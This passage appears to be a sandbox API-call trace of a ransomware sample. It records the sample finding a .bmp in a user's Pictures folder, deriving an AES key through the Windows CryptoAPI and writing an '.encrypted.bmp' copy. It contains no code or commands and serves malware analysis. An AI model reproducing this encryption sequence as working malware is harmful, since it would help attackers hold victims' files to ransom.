lpString1="4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.947] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.947] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.948] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.948] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.948] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.948] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.948] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.948] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0xa7b7e2d0, ftLastWriteTime.dwHighDateTime=0x1d5b90c, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 0x7c2100 [0040.948] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.948] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.948] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.948] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.948] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.948] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.948] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.949] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.949] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.949] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.949] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.949] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.949] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.949] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.949] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0040.950] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.950] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.950] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.950] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.950] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.951] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.951] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.951] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.951] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.951] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.951] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.951] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.951] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.951] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.951] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.951] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.952] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.952] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.952] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.952] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.953] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.953] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.953] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0040.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.953] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.953] CryptDestroyHash (hHash=0x7c2240) returned 1 [0040.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\9repn4ayx.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.954] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.954] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.954] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.954] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.954] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.956] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0")) returned 0x10 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\9repn4ayx.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, 